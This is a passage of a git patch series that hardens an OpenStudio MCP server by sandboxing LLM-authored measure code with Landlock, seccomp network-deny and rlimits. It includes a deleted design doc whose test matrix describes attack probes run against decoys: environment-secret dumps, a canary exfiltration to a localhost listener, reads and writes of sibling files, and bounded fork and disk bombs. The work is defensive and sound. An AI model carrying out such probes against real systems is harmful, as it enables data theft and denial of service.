                 capture_output=True, text=True, timeout=60, check=False,
             )
 

From 3d9de873f434b9d3ce93d2d80bf81ac727151eb2 Mon Sep 17 00:00:00 2001
From: brianlball <brian.ball@nrel.gov>
Date: Sat, 6 Jun 2026 14:01:03 -0400
Subject: [PATCH 04/26] feat(security): secure-by-default + local/non-root
 protection (sandbox increment 4)

Decouple the confinement layers and make auto the default:
- _sandbox_exec: drop uid only when root; the unprivileged layers (Landlock +
  seccomp + rlimits) still apply for a non-root local server.
- sandbox.py: degrade loudly on platforms with no kernel backend (macOS/Windows
  -> clean-env only + one-shot warning); chown run dir only when root;
  active_tier() reports "clean-env" where no backend.
- config: OSMCP_SANDBOX default off -> auto (off stays the escape hatch).

This protects LOCAL users: the server bind-mounts host dirs (/repo, /inputs);
the sandbox makes them read-only so an LLM-authored measure can't write the
user's real files. Full suite previously verified green under auto (721 passed).

Co-Authored-By: Claude Opus 4.8 (1M context) <noreply@anthropic.com>
---
 docs/plans/measure-exec-sandbox.md | 23 +++++++++++++++++------
 mcp_server/_sandbox_exec.py        | 22 ++++++++++++++--------
 mcp_server/config.py               | 13 ++++++++-----
 mcp_server/sandbox.py              | 23 ++++++++++++++++++++++-
 4 files changed, 61 insertions(+), 20 deletions(-)

diff --git a/docs/plans/measure-exec-sandbox.md b/docs/plans/measure-exec-sandbox.md
index 409accf..bccb435 100644
--- a/docs/plans/measure-exec-sandbox.md
+++ b/docs/plans/measure-exec-sandbox.md
@@ -166,18 +166,25 @@ primary control: tools stay on by default because their execution is confined.
    measures + weather (39 tests) green under `auto`.
 4. bwrap backend + userns probe + operator docs — medium (optional upgrade)
 5. Elicitation gate — defer
-6. Flip default `OSMCP_SANDBOX` off → `auto` — **next.** Gate: run the FULL
-   integration suite (all shards) under `auto` first to surface any remaining
-   Landlock allowlist gaps; add missing ro paths (no rebuild); then flip the
-   default (or set `OSMCP_SANDBOX=auto` in the deployment/Dockerfile ENV).
-   Still pending from bucket 1: wire sim-timeout *enforcement* into the dispatcher.
+6. Secure-by-default + local protection — **DONE (increment 4):** decoupled the
+   layers so the unprivileged ones (Landlock + seccomp + rlimits) apply even when
+   the server runs **non-root** (the uid-drop is the only root-gated layer, now
+   skipped gracefully); `wrap_cmd` degrades loudly on platforms with no kernel
+   backend (macOS/Windows → clean-env only + one-shot warning); flipped the code
+   default `off → auto`. This protects LOCAL users too: the server bind-mounts the
+   user's host dirs (`/repo`, `/inputs`), and the sandbox makes them read-only so
+   an LLM-authored measure can't write into the user's real files. Gate met: full
+   suite **721 passed under auto**; only fix needed was the test_measure TMPDIR
+   one (Docker-bind unlinked-tempfile). `off` remains the explicit escape hatch.
+   Still pending: wire sim-timeout *enforcement* into the dispatcher; optional
+   macOS Seatbelt backend.
 
 ## Testing strategy
 
 Goal: tests that (a) **prove the holes exist today** without touching anything
 real, and (b) **prove each is closed** after the fix. Both halves run in CI.
 
-**Status:** `tests/test_sandbox.py` — 9 integration tests, all passing (~34s).
+**Status:** `tests/test_sandbox.py` — 11 integration tests, all passing.
 Kept LOCAL / git-excluded (working exploit PoC), run via the standalone
 `.github/workflows/security.yml`, NOT the main `ci` shards. Probes are generated
 at runtime via `create_measure` (Ruby + Python) so the real create→apply path is
@@ -187,6 +194,10 @@ exercised. Coverage:
 - auto (Landlock + seccomp): read-escape + write-escape + net exfil blocked,
   run still succeeds
 - unconditional: `measure_dir` traversal rejected
+- local issue (dual-run): an unconfined measure writes into the user's
+  bind-mounted host dir (`/repo`); the sandbox blocks it
+- non-root: Landlock confines even when the shim runs as a non-root uid (the
+  uid-drop is skipped, FS confinement still applies)
 
 ### Core principle — dual-run falsifiability
 
diff --git a/mcp_server/_sandbox_exec.py b/mcp_server/_sandbox_exec.py
index ee23b24..03bdb6f 100644
--- a/mcp_server/_sandbox_exec.py
+++ b/mcp_server/_sandbox_exec.py
@@ -88,14 +88,20 @@ def main(argv: list[str]) -> int:
         if not _seccomp.install_net_deny():
             print("sandbox-exec: WARNING seccomp net-deny unavailable — network not confined", file=sys.stderr)
 
-    # Drop privileges: supplementary groups, then gid, then uid (order matters —
-    # setgroups/setgid require privilege we lose after setuid).
-    os.setgroups([ns.gid])
-    os.setgid(ns.gid)
-    os.setuid(ns.uid)
-    if os.getuid() != ns.uid or os.geteuid() != ns.uid:
-        print("sandbox-exec: uid drop did not stick", file=sys.stderr)
-        return 2
+    # Drop privileges only when we have them (root). The FS/network confinement
+    # above is unprivileged and already applied — so a non-root local server still
+    # gets Landlock + seccomp + rlimits; only the uid-drop (a defence-in-depth /
+    # multi-tenant layer) is skipped. Order matters: groups, gid, then uid.
+    if os.geteuid() == 0:
+        os.setgroups([ns.gid])
+        os.setgid(ns.gid)
+        os.setuid(ns.uid)
+        if os.getuid() != ns.uid or os.geteuid() != ns.uid:
+            print("sandbox-exec: uid drop did not stick", file=sys.stderr)
+            return 2
+    elif os.getuid() != ns.uid:
+        print(f"sandbox-exec: not root (uid {os.getuid()}) — keeping uid; "
+              "FS/network confinement still applied", file=sys.stderr)
 
     try:
         os.execvp(cmd[0], cmd)  # noqa: S606 - intentional shell-less exec of the confined command
diff --git a/mcp_server/config.py b/mcp_server/config.py
index 22a20aa..61042be 100644
--- a/mcp_server/config.py
+++ b/mcp_server/config.py
@@ -59,11 +59,14 @@ def _safe_float(env_val: str, default: float) -> float:
 ENABLE_CODE_MODE = os.environ.get("OSMCP_CODE_MODE", "").lower() in ("1", "true")
 
 # Subprocess confinement for measure/simulation execution (see mcp_server/sandbox.py).
-#   off    — full passthrough (current behaviour / explicit escape hatch)
-#   posix  — clean-env allowlist (+ UID drop & rlimits in later increments)
-#   auto   — best confinement available (currently == posix)
-# Default off during rollout; flips to auto once the full suite passes confined.
-SANDBOX_MODE = os.environ.get("OSMCP_SANDBOX", "off").strip().lower()
+#   off    — full passthrough (explicit escape hatch for trusted/local-tooling use)
+#   posix  — clean-env allowlist + UID drop (if root) + rlimits
+#   auto   — best confinement available (default): clean-env + Landlock FS +
+#            seccomp net-deny + rlimits, plus UID drop when running as root.
+# Secure by default. Degrades loudly: the unprivileged layers (Landlock/seccomp)
+# apply even for a non-root local server; on a platform without a kernel backend
+# (macOS/Windows bare installs) it falls back to clean-env only and logs a notice.
+SANDBOX_MODE = os.environ.get("OSMCP_SANDBOX", "auto").strip().lower()
 # Network policy for confined subprocesses: deny (default) blocks outbound TCP
 # once the seccomp backend lands; allow leaves it open (trusted/BCL deployments).
 SANDBOX_NET = os.environ.get("OSMCP_SANDBOX_NET", "deny").strip().lower()
diff --git a/mcp_server/sandbox.py b/mcp_server/sandbox.py
index 336572d..95084d7 100644
--- a/mcp_server/sandbox.py
+++ b/mcp_server/sandbox.py
@@ -50,6 +50,8 @@
 _RO_SYSTEM = ("/usr", "/lib", "/lib64", "/bin", "/sbin", "/etc",
               "/opt/venv", "/usr/local", "/var/oscli", "/proc", "/sys")
 
+_warned_no_backend = False  # one-shot log when no kernel backend (non-Linux)
+
 # Environment the OpenStudio CLI / bundler / EnergyPlus / measure code legitimately
 # needs. Everything else — notably any host secret — is dropped in confined modes.
 _ENV_ALLOW_EXACT = frozenset({
@@ -74,10 +76,17 @@ def _full() -> bool:
     return SANDBOX_MODE in _FULL_MODES
 
 
+def _has_backend() -> bool:
+    """True where the kernel confinement shim can run (Landlock/seccomp = Linux)."""
+    return sys.platform.startswith("linux")
+
+
 def active_tier() -> str:
     """The confinement tier actually in effect — surfaced in tool output."""
     if not enabled():
         return "off"
+    if not _has_backend():
+        return "clean-env"  # env stripping only; no kernel backend on this platform
     return "landlock" if _full() else "posix"
 
 
@@ -133,6 +142,16 @@ def wrap_cmd(cmd: list[str], work_dir: Path | str) -> list[str]:
     """
     if not enabled():
         return list(cmd)
+    if not _has_backend():
+        # macOS/Windows bare installs: no kernel sandbox shim. Run unwrapped
+        # (clean-env from build_env still strips secrets); warn once.
+        global _warned_no_backend
+        if not _warned_no_backend:
+            print(f"[sandbox] no kernel confinement backend on {sys.platform}; "
+                  "running unwrapped (clean-env only) — use the Docker image for "
+                  "full FS/network confinement", file=sys.stderr)
+            _warned_no_backend = True
+        return list(cmd)
     wrapped = [
         sys.executable, "-m", "mcp_server._sandbox_exec",
         "--uid", str(SANDBOX_UID), "--gid", str(SANDBOX_GID),
@@ -165,7 +184,9 @@ def prepare_workdir(work_dir: Path | str) -> None:
     outputs afterwards. Bind mounts that ignore ownership (e.g. Docker Desktop)
     make this a harmless no-op there — confinement still holds for in-image paths.
     """
-    if not enabled():
+    # Only the root server needs to hand the dir to the sandbox uid; when not root
+    # the shim keeps the current uid, which already owns the dir it created.
+    if not enabled() or not (hasattr(os, "geteuid") and os.geteuid() == 0):
         return
     work = Path(work_dir)
     with contextlib.suppress(OSError):

From e75d0b8fd32253297d90b4725e8371eb33e49bcc Mon Sep 17 00:00:00 2001
From: brianlball <brian.ball@nrel.gov>
Date: Sat, 6 Jun 2026 17:28:47 -0400
Subject: [PATCH 05/26] chore: stop tracking docs/plans/measure-exec-sandbox.md
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

Planning/working doc — keep local-only, not in the repo. Removed from the tree
(history retains it); now git-excluded so it won't be re-added.

Co-Authored-By: Claude Opus 4.8 (1M context) <noreply@anthropic.com>
---
 docs/plans/measure-exec-sandbox.md | 369 -----------------------------
 1 file changed, 369 deletions(-)
 delete mode 100644 docs/plans/measure-exec-sandbox.md

diff --git a/docs/plans/measure-exec-sandbox.md b/docs/plans/measure-exec-sandbox.md
deleted file mode 100644
index bccb435..0000000
--- a/docs/plans/measure-exec-sandbox.md
+++ /dev/null
@@ -1,369 +0,0 @@
-# Measure-exec sandbox: keep the tools, confine the subprocess
-
-**Status:** researched, proposed · **Supersedes** the deny-tools approach in
-`safe-mode-disabled-tools.md` as the primary answer to external-review point 4.
-(Denylist stays as an operator opt-out knob, but it removes core functionality —
-not a real solution.)
-
-## Decision: follow the Codex CLI model
-
-Adopt OpenAI Codex CLI's architecture as the template (it solves our exact
-problem: confine a native subprocess inside a container we don't control), with
-one tightening:
-
-- **Landlock for the filesystem** — but **read-deny-by-default** (stricter than
-  Codex's read-allow-all). We can enumerate the few dirs `openstudio run` needs,
-  so we afford the stronger posture without breaking the happy path.
-- **seccomp BPF to block network** — deny `socket(AF_INET/AF_INET6)`, allow
-  `AF_UNIX`. This is how Codex blocks net on kernels < 6.7. **Key consequence:
-  net-deny works at ANY Landlock ABI (incl. our WSL2 abi3), unprivileged, no
-  launch flags** — installing a seccomp filter needs only `no_new_privs` (which
-  we already set for Landlock), and `seccomp`/`prctl` are in Docker's default
-  allowlist.
-- **no_new_privs + setuid drop + rlimits** underneath (the POSIX floor).
-- **bwrap** only as an opportunistic upgrade (adds mount/PID/net namespaces)
-  where a startup userns probe passes — never the baseline.
-- **Degrade loudly** — probe at startup, stamp the active tier into every exec's
-  audit line + tool output; `OSMCP_SANDBOX=off` must be explicit and is logged.
-
-Why Codex over Anthropic `sandbox-runtime`: srt's primary primitive is
-bwrap/userns — exactly what stock Linux Docker seccomp blocks. Codex's
-Landlock+seccomp needs no privileges and no launch flags, so it runs in the
-operator's unmodified container. srt's richer egress allowlist (external proxy)
-is overkill — we want net-deny, which a seccomp filter gives for free.
-
-**This collapses the tiers**: FS confinement (Landlock) + net-deny (seccomp) +
-UID/rlimits (POSIX) all run together in stock Docker ≥23.0 with zero launch
-flags. bwrap is a bonus, not a requirement.
-
-## Insight
-
-All arbitrary-code execution already funnels through 3 subprocess sites:
-
-| Site | Location | Cmd | Today |
-|---|---|---|---|
-| `apply_measure` | `skills/measures/operations.py:248` | `openstudio run --measures_only -w` | timeout 300s, full env, root |
-| `test_measure` | `skills/measure_authoring/operations.py:1015` | `pytest` / `ruby` | timeout 60s, full env, root |
-| `run_osw`/`run_simulation` | `skills/simulation/operations.py:265` (`_launch`) | `openstudio run -w` | **no timeout**, full env, root |
-
-The subprocess needs: ro on OpenStudio/EnergyPlus install, `/var/oscli` gems,
-`/opt/*-measures`, `/inputs`, `/repo`; rw ONLY on its run dir. Nothing else.
-That maps 1:1 onto a filesystem sandbox policy. Wrap these 3 sites → full
-functionality, contained blast radius.
-
-## Why not the alternatives
-
-- **WASM (pydantic mcp-run-python style):** can't run native EnergyPlus/Ruby. Out.
-- **microVMs (E2B/Modal/Firecracker/gVisor):** need host control / KVM; we're a
-  process inside someone's container. Host-level gVisor stays a docs recommendation.
-- **Static analysis of measure code:** bypassable, not security.
-- **NREL OpenStudio-server prior art:** none — zero sandboxing, single-tenant trust
-  model. We'd be ahead of upstream.
-- **Closest prior art:** OpenAI Codex CLI (Landlock + seccomp, bwrap where possible,
-  explicit degrade) and Anthropic sandbox-runtime (bwrap + seccomp + net proxy).
-
-## Design: tiered sandbox, probed at startup, best tier wins
-
-One wrapper at the 3 chokepoints, e.g. `mcp_server/sandbox_exec.py` (or a
-`sandboxed_run()` drop-in for `subprocess.run`/`Popen`):
-
-**Tier 0 — POSIX floor (always on):**
-- Drop root → dedicated `sandbox` UID via wrapper exec (`setpriv --reuid --regid
-  --clear-groups --no-new-privs`) — NOT `preexec_fn` (fork-safety in threaded server)
-- Run dirs `0700` sandbox-owned; install/mounts root-owned ro
-- rlimits: `RLIMIT_CPU`, `RLIMIT_FSIZE` (caps SQL/ESO blowups), `RLIMIT_NPROC`,
-  `RLIMIT_AS` (generous — EnergyPlus legitimately uses GBs), `RLIMIT_NOFILE`
-- Clean env: pass explicit allowlist (`PATH`, `RUBYLIB`, `ENERGYPLUS_EXE_PATH`,
-  bundler vars, `HOME=<run_dir>`, `TMPDIR=<run_dir>/tmp`) — today
-  `os.environ.copy()` leaks everything
-- `start_new_session=True` + kill process group on timeout/cancel
-
-**Tier 1 — Landlock LSM (default kernel sandbox):**
-- Works inside default-seccomp Docker ≥23.0, unprivileged, zero launch flags —
-  the only kernel sandbox with that property (`landlock_*` syscalls allowlisted
-  since moby 2022; verified in current default profile)
-- Policy: ro+exec `/usr`, `/lib*`, `/usr/local/openstudio-*`, `/var/oscli`,
-  `/opt/comstock-measures`, `/opt/common-measures`, `/inputs`, `/repo`;
-  rw only `<run_dir>`; requires `prctl(PR_SET_NO_NEW_PRIVS)` first
-- Landlock ABI ≥4 (kernel 6.7) can also deny TCP natively; WSL2 dev kernel =
-  ABI 3 (FS only, verified). We do NOT rely on this for network — see seccomp.
-- Implement: ~100-line ctypes module we own (PyPI `landlock` pkg is 27★/dev
-  release; `landrun` CLI is Go binary) — syscall surface is 3 calls
-
-**Tier 1b — seccomp BPF net-deny (rides with Landlock):**
-- BPF filter returning `EAFNOSUPPORT` for `socket(AF_INET/AF_INET6)`, allowing
-  `AF_UNIX` (so the OpenStudio bundler / local IPC still works). Installed in the
-  same wrapper right after `no_new_privs`.
-- Works at ANY kernel/ABI in stock Docker — this is our network control, not
-  Landlock-abi4 or bwrap. (Codex's exact mechanism.)
-- Implement: raw BPF in the wrapper shim, or `pyseccomp`/libseccomp if we accept
-  the dep. Lean raw-BPF to stay dep-free and grepable.
-
-**Tier 2 — bubblewrap (opportunistic upgrade):**
-- `bwrap --unshare-all --clearenv --die-with-parent` + ro-binds + run-dir bind:
-  adds mount-ns illusions + **network-ns (no net even on ABI 3 kernels)**
-- Blocked by stock Docker seccomp on Linux hosts (`clone(CLONE_NEWUSER)` denied
-  without CAP_SYS_ADMIN; moby#42441 still open). Docker Desktop/WSL2 ships
-  seccomp-unconfined → works there today (probed and confirmed in our dev container)
-- Enable only when startup userns probe passes; document operator flags
-  (custom seccomp profile > `--cap-add SYS_ADMIN`; Ubuntu 24.04 hosts also need
-  AppArmor userns relief) for Linux deployments that want tier 2
-
-**Probe at startup, audit one `sandbox_tier` event, and report the active tier
-in tool responses** (`"sandbox": "bwrap" | "landlock-abi3" | "posix" | "none"`)
-— degradation must be visible, never silent (Codex pattern).
-
-## Orthogonal quick wins (do regardless)
-
-1. `is_path_allowed()` check on `apply_measure(measure_dir=...)` — today accepts
-   any path holding a `measure.rb` (other users' runs!)
-2. Timeout (or operator-config max walltime) on `run_osw`/`run_simulation` —
-   only manual cancel today
-3. Clean env allowlist (tier 0 item, but ship first — trivial, closes secret leakage)
-
-## Optional human gate (HITL, not containment)
-
-MCP elicitation: FastMCP `ctx.elicit()` ≥2.10; Claude Code supports it ≥v2.1.76,
-Claude Desktop does NOT yet. Pattern: show measure code diff → accept/decline
-before exec. Fallback for non-supporting clients: return
-`{"needs_approval": true, "code_sha256": ...}` → second call with
-`approved_sha256=`. Complements sandbox; doesn't replace it (the LLM writes the
-code the human skims). Defer to v2 unless an operator asks.
-
-## Relation to safe-mode denylist
-
-Keep `OSMCP_DISABLED_TOOLS` / `OSMCP_SAFE_MODE` as a small operator knob
-(some deployments genuinely want measure-authoring off), but the sandbox is the
-primary control: tools stay on by default because their execution is confined.
-
-## Implementation order
-
-1. Quick wins (env allowlist, `measure_dir` path check, sim timeout) — small
-   **— DONE (increment 1):** `OSMCP_SANDBOX` knob + `mcp_server/sandbox.py`
-   clean-env allowlist wired into all 3 exec sites (`apply_measure`,
-   `test_measure`, sim `_launch`); unconditional `is_path_allowed` check on
-   `apply_measure(measure_dir=)`; `OSMCP_SIM_TIMEOUT_SECONDS` config added.
-   No Docker rebuild (pure Python). Default `off` = passthrough, so the existing
-   suite is untouched. Verified: clean-env hides the canary under `posix` and a
-   normal run still succeeds; traversal rejected; `test_measures` green.
-   **Still pending in this bucket:** wire the sim-timeout *enforcement* into the
-   dispatcher (config constant exists; `_launch`/dispatch loop must kill runs
-   past the cap via the existing SIGTERM→SIGKILL path).
-2. POSIX floor: UID drop + rlimits — **DONE (increment 2):** `sandbox` user baked
-   into the image (`useradd -u 1001`); `mcp_server/_sandbox_exec.py` shim drops
-   root→1001, applies rlimits (FSIZE 10G / NPROC 1024 on; CPU/AS off), sets
-   no_new_privs, execs (pid preserved); `wrap_cmd`/`prepare_workdir` in
-   `sandbox.py`. Verified: measure runs as uid 1001, NPROC rlimit applied, DAC
-   blocks root-owned write; real EnergyPlus sim runs fine under `posix`.
-3. Landlock FS + seccomp net-deny — **DONE (increment 3):** own ctypes modules
-   `_landlock.py` (read-deny-by-default; ro system roots, rw only the run dir +
-   /dev) and `_seccomp.py` (raw single-arch cBPF: deny `socket(AF_INET/INET6)`,
-   EAFNOSUPPORT). Applied in the shim after no_new_privs, degrade-loudly. Pure
-   Python — no rebuild; chose raw BPF over pyseccomp (its wheel imports broken
-   here). `OSMCP_SANDBOX=auto` = full tier; `active_tier()` reports `landlock`.
-   Verified: read-escape (world-readable /opt file), write-escape, and network
-   exfil all blocked while apply + real sim still succeed; comstock/common
-   measures + weather (39 tests) green under `auto`.
-4. bwrap backend + userns probe + operator docs — medium (optional upgrade)
-5. Elicitation gate — defer
-6. Secure-by-default + local protection — **DONE (increment 4):** decoupled the
-   layers so the unprivileged ones (Landlock + seccomp + rlimits) apply even when
-   the server runs **non-root** (the uid-drop is the only root-gated layer, now
-   skipped gracefully); `wrap_cmd` degrades loudly on platforms with no kernel
-   backend (macOS/Windows → clean-env only + one-shot warning); flipped the code
-   default `off → auto`. This protects LOCAL users too: the server bind-mounts the
-   user's host dirs (`/repo`, `/inputs`), and the sandbox makes them read-only so
-   an LLM-authored measure can't write into the user's real files. Gate met: full
-   suite **721 passed under auto**; only fix needed was the test_measure TMPDIR
-   one (Docker-bind unlinked-tempfile). `off` remains the explicit escape hatch.
-   Still pending: wire sim-timeout *enforcement* into the dispatcher; optional
-   macOS Seatbelt backend.
-
-## Testing strategy
-
-Goal: tests that (a) **prove the holes exist today** without touching anything
-real, and (b) **prove each is closed** after the fix. Both halves run in CI.
-
-**Status:** `tests/test_sandbox.py` — 11 integration tests, all passing.
-Kept LOCAL / git-excluded (working exploit PoC), run via the standalone
-`.github/workflows/security.yml`, NOT the main `ci` shards. Probes are generated
-at runtime via `create_measure` (Ruby + Python) so the real create→apply path is
-exercised. Coverage:
-- off: all five holes confirmed (root, env leak, read/write escape, net exfil)
-- posix: uid 1001, NPROC rlimit, DAC blocks root-owned write, env stripped
-- auto (Landlock + seccomp): read-escape + write-escape + net exfil blocked,
-  run still succeeds
-- unconditional: `measure_dir` traversal rejected
-- local issue (dual-run): an unconfined measure writes into the user's
-  bind-mounted host dir (`/repo`); the sandbox blocks it
-- non-root: Landlock confines even when the shim runs as a non-root uid (the
-  uid-drop is skipped, FS confinement still applies)
-
-### Core principle — dual-run falsifiability
-
-Every security test runs the SAME attack measure twice:
-- `OSMCP_SANDBOX=off` → attack must **SUCCEED**. Proves the hole is real today
-  AND proves the attack mechanism actually fires. A sandbox test that can't show
-  the attack succeeding unsandboxed is vacuous (green for the wrong reason).
-- `OSMCP_SANDBOX=auto` (best active tier) → attack must be **BLOCKED**, with the
-  violation visible in tool output.
-
-A fix is "proven" only when the off-run breaches and the on-run blocks. The
-off-run is the regression guard against vacuous-green.
-
-### Safety — canaries + decoys, never real targets
-
-No test touches a real secret, real sensitive file, or real network:
-- **Decoy "victim" run** — fixture creates `runs/_decoy_victim/{run_record.json,
-  secret.txt}` (known content), a SIBLING of the granted run_dir → reading/writing
-  it from inside the sandbox is a genuine escape, but it sits on the disposable
-  runs volume and the fixture deletes it. (cross-user read/write.)
-- **Canary env secret** — launch the test server with
-  `OSMCP_CANARY_SECRET=do-not-leak-<rand>`. A fake value, never a real credential.
-  (the `os.environ.copy()` leak.)
-- **Localhost canary listener** — throwaway TCP server on `127.0.0.1:<port>`;
-  measure tries to POST the canary to it. Nothing leaves the machine. (net exfil.)
-- **Bounded resource probes (critical)** — the off/control run must NEVER run an
-  unbounded bomb. Fork test forks a fixed modest N (e.g. 64) and checks they
-  succeed → infers "no NPROC cap" without a real fork bomb. Disk test writes a
-  fixed small file in the control to confirm "no FSIZE cap" without filling disk.
-  CPU/memory controls are SKIPPED (can't bound an unlimited spin/alloc safely);
-  on-runs allocate/spin just past the configured cap and assert the cap fires.
-  Outer pytest timeout + an outer rlimit on the test process backstop everything.
-
-All attack measures are committed fixtures under `tests/assets/sandbox_probes/`,
-run only inside the disposable container.
-
-### How a probe measure reports outcome
-
-Each attack measure attempts the action, rescues the error, and
-`runner.registerInfo("PROBE <name> result=<ok|errno>")` — `apply_measure` returns
-runner messages, so the test asserts on them. The AUTHORITATIVE check is external
-ground truth (decoy file untouched / listener received nothing / recorded euid),
-not the measure's self-report. Two independent assertions per test.
-
-### Per-issue test matrix
-
-| # | Issue | Attack measure does | off (today) | on (fixed) | min tier |
-|---|---|---|---|---|---|
-| 1 | Write escape | `File.write` to decoy sibling dir | write succeeds, decoy modified | EACCES, decoy unchanged | landlock |
-| 2 | Read other user's run | `File.read` decoy `secret.txt` | returns known content | EACCES, content absent from output | landlock |
-| 3 | Env secret leak | dump ENV to run_dir | canary present | canary absent | posix (clean env) |
-| 4 | Runs as root | record `Process.uid` | uid==0 | uid==1001 (sandbox) | posix |
-| 5 | Network exfil | TCP connect+POST canary to 127.0.0.1 | listener receives canary | connection refused, nothing received | seccomp |
-| 6 | Fork storm | fork N=64 (bounded) | all succeed | blocked past NPROC cap | posix (rlimit) |
-| 7 | Disk bomb | write past FSIZE cap in run_dir | (control: small file, no cap) | SIGXFSZ/EFBIG at cap | posix (rlimit) |
-| 8 | CPU spin | busy loop | (control skipped) | SIGXCPU at CPU cap | posix (rlimit) |
-| 9 | Memory bomb | alloc past AS cap | (control skipped) | ENOMEM at cap | posix (rlimit) |
-| 10 | No sim timeout | sleep 60s, cap=5s | (control: outer timeout) | killed ~5s, status failed/timeout | walltime mgr |
-| 11 | measure_dir traversal | `apply_measure(measure_dir=<decoy victim>)` | copies/executes | `{ok:false, "not allowed"}` | path check (no exec) |
-
-### Tier-awareness (honest skips, not vacuous passes)
-
-Active tier depends on the runner's kernel/Docker:
-- Local WSL2 = landlock-abi3 + seccomp (+ bwrap if userns probe passes on Docker
-  Desktop's unconfined daemon).
-- CI ubuntu-24.04 = Docker ≥23 / kernel 6.x → landlock-abi4 + seccomp; bwrap
-  blocked by default seccomp.
-
-Each test declares its min tier (matrix col). If active tier < needed → **SKIP
-with a loud reason** ("net confinement needs seccomp; active=posix"), never
-silent-pass. Plus a **guard test**: in the integration env assert active tier ∈
-{landlock-abi3, landlock-abi4, bwrap}; FAIL if posix/none — that would mean the
-sandbox silently didn't engage and the whole suite is vacuous.
-
-### Tier-probe unit tests
-
-Force each tier path, assert the correct argv is built (setpriv / landlock-shim /
-bwrap) and that the probe downgrades correctly when a syscall is stubbed to fail.
-Unit tier (no `openstudio` import).
-
-### Repo compliance
-
-- Integration tier (real `openstudio` CLI, mock nothing),
-  `RUN_OPENSTUDIO_INTEGRATION=1`, AAA structure, `# Regression:`/`# Validates:`
-  comments, exact assertions incl. error-message text, `parametrize` the issue
-  set, add to the lightest CI shard.
-- New file `tests/test_sandbox.py` + fixtures `tests/assets/sandbox_probes/`.
-
-## Resolved decisions (defaults)
-
-Net effect: works in stock Docker, no launch flags, blast radius = the run dir,
-with operator knobs for looser (trusted/BCL) or tighter (cgroup memory) needs.
-
-1. **Min Docker version → don't gate; probe-and-degrade. Document 23.0 as the FS
-   line.** seccomp + UID + rlimits work on ~any Docker (those syscalls
-   default-allowed for years); only Landlock FS confinement needs ≥23.0. A hard
-   minimum would block legit operators for no safety gain — on old Docker you
-   lose FS-deny but keep net-deny + UID + rlimits, and the tier report says so.
-
-2. **One shared `sandbox` UID for v1, not per-run ephemeral.** Landlock isolates
-   the filesystem *per process* — two runs sharing UID 1001 each get a ruleset
-   granting only their own run_dir, so cross-run file access is blocked by
-   Landlock, not DAC; the UID barely matters for the main threat. Per-run UIDs
-   add a UID pool + chown + cleanup for little gain at `MAX_CONCURRENCY=1`
-   (current default). Close the same-UID residual (ptrace/signal between
-   concurrent runs) by adding `ptrace` to the seccomp deny list. Shared
-   `RLIMIT_NPROC` accounting is a minor co-tenant DoS, irrelevant at concurrency
-   1. **Upgrade trigger:** revisit per-run UIDs only if a multi-user deployment
-   raises per-user concurrency > 1.
-
-3. **seccomp net-deny via libseccomp (`pyseccomp`), not hand-rolled BPF.**
-   Security-critical filter, and we ship **amd64 + arm64** — raw BPF must
-   hand-handle `AUDIT_ARCH` + per-arch syscall numbers for both, and a
-   subtly-wrong filter fails open. libseccomp is what Docker itself uses,
-   abstracts the arch mess, and `libseccomp2` is already in the base image. The
-   repo's dep-minimization rule targets heavyweight *unnecessary* deps (the
-   OpenLLMetry case), not reimplementing a security primitive across two arches.
-   (Raw BPF acceptable ONLY with explicit amd64+arm64 AUDIT_ARCH handling + a
-   fail-closed test per arch — not worth it.)
-
-4. **rlimits = generous anti-runaway backstops, operator-tunable env vars; not
-   tight quotas.** A tight cap silently breaks real sims (EnergyPlus uses GBs,
-   annual SQL is hundreds of MB–GB) — worse than no cap for the modeler.
-   - `RLIMIT_AS`: **avoid as primary** — counts virtual address space (mmap'd
-     libs), breaks allocators. Unset or ~24 GB backstop; push real memory control
-     to container cgroup (`docker run --memory`), document that.
-   - `RLIMIT_FSIZE`: ~10 GB per-file runaway guard. Real disk control = retention
-     GC + per-run-dir quota (cgroup/quota territory, rlimit can't express).
-   - `RLIMIT_NPROC` ~512, `RLIMIT_NOFILE` ~4096, `RLIMIT_CPU` ~2× the existing
-     300 s measure timeout.
-
-5. **Sim walltime cap: add `OSMCP_SIM_TIMEOUT_SECONDS`, default 7200 (2 h),
-   0 = unlimited.** Real gap today (sims hang forever; manual cancel only). 2 h
-   is a hang-catcher, not a tight bound — big annual/parametric runs take
-   10–30+ min, so a low default would silently kill legit work. Reuse the
-   dispatcher's existing SIGTERM→SIGKILL path (`cancel_run`). Fire loudly:
-   status=`timeout`, clear error.
-
-6. **Own ctypes Landlock module, don't vendor `landrun`.** 3 syscalls, ~100
-   lines, fully grepable/auditable — matches house style ("everything direct,
-   visible in stack traces"). `landrun` is a young (Mar 2025) external Go binary
-   = supply-chain dep + vendoring across 2 arches + another thing to track, for
-   security-critical code we should own. PyPI `landlock` pkg is dev-release/27★ —
-   don't depend on that either. (Per-arch syscall-number care as in #3, but
-   Landlock numbers are stable.)
-
-7. **Sandbox `test_measure` too, same wrapper.** pytest/ruby on LLM-authored
-   measure code is the same arbitrary-exec threat as `apply_measure` — "test this
-   measure" *is* the trust-the-code moment. Its legit needs (own test fixtures,
-   test model) live in granted dirs. Caveat: a test that legitimately hits the
-   network (BCL download) breaks under net-deny — see #8.
-
-8. **Default net-deny; expose `OSMCP_SANDBOX_NET=deny|allow`; confirm
-   empirically.** `openstudio run -w` runs EnergyPlus locally and `--bundle`
-   resolves from the offline gem path → should need no AF_INET, so net-deny
-   shouldn't break normal runs — **but verify, don't assume** (smoke test: a
-   normal sim succeeds under net-deny). The real exception is BCL-downloading
-   measures (need AF_INET); blocking them is *correct* for untrusted mode but
-   trusted deployments want them — hence the toggle. AF_UNIX always allowed
-   (local IPC/bundler).
-
-## Still open (need your input)
-
-- Exact rlimit/timeout default *values* above — sane for your largest real
-  models? (chosen as backstops, not measured against a worst-case OSM)
-- Container-level memory cgroup: document-only, or ship a recommended
-  `--memory` in compose / run docs?
-- Per-run-dir disk quota — out of scope for v1, or needed now? (rlimit can't do
-  it; needs cgroup/quota)

From 90e89c66066f9c591ca9a8d9b93d42c535efd05d Mon Sep 17 00:00:00 2001
From: brianlball <brian.ball@nrel.gov>
Date: Sat, 6 Jun 2026 17:40:53 -0400
Subject: [PATCH 06/26] refactor(security): add reject_escaping_symlinks()
 staging guard

Co-Authored-By: Claude Opus 4.8 (1M context) <noreply@anthropic.com>
---
 mcp_server/util.py | 27 +++++++++++++++++++++++++++
 1 file changed, 27 insertions(+)

diff --git a/mcp_server/util.py b/mcp_server/util.py
index 75ef54c..d3d2926 100644
--- a/mcp_server/util.py
